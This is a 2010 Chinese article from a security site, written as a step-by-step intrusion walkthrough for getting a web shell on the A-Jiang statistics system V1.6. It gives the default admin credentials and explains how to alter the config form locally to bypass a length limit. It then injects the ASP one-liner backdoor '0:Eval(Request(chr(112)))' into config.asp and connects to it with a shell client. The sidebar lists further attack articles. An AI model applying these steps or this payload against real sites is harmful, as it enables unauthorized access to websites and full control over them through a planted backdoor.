首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
啊江统计系统V1.6 版本后台拿SHELL
来源:vfocus.net 作者:冰鱼 发布时间:2010-12-27  
 

因是大约一个月钱在刀客的群里 看到刀客大牛用这个统计系统拿下了一个SHELL  那个时候我没怎么注意 因为平时碰到这样的站很少 也就没听大牛们的详细思路了!

无奈到了自己这里今天下午又碰到个一样的站 纠结···

不多说了 首先感谢小帆同学 猪猪同学对程序代码的分析·(我自己硬是整了半个小时没整出来利用方法·)


此后台默认的账号密码是 admin admin ,  ITlearner  ITlearner

先进后台


来到修改配置界面 保存源文件到本地

本地打开源文件 找到原文章访问量 把maxlength="10 修改为 maxlength="100  下边是修改后的截图


然后在本地文件修改action地址 例如IE 中的提交地址是http://www.f4sh.com/count/admin.asp?action=ShowConfig

那么我们就修改为 action="http://www.f4sh.com/count/admin.asp?Action=SaveConfig"

下边是修改后的截图


然后保存文件 用IE 打开 在网站访问量地址后写入  0:Eval(Request(chr(112)))


这个一句话的密码是P  点击修改 一句话就被插到了 count/config.asp 这个文件了 打开一句话客户端就可以连接了


只是个自己积累的小小的过程 对于网上关于阿江统计拿SHELL的方法我也测试了很多 但是没几个能成功的 所以专门写了这个文章出来 其实就是本地修改下字节 因为源程序中限制了写入的字节数 没有什么技术含量 不要骂我···


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·Metasploit with MYSQL in BackT
·The Operation Outbreak Attack
·另类网站入侵之一句话木马图片的
·Exploitation Without A TTY
·长达1年半的一次艰难渗透
·Windows系统密码破解全攻略(hash
·时间和状态:利用漏洞改变游戏角
·暴力破解asp一句话[php版]
·GRE数据包注入攻击
·oracle低权限下获取shell
·WebLogic简单抓鸡大法
·各种渗透,提权的经验和技巧总结
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved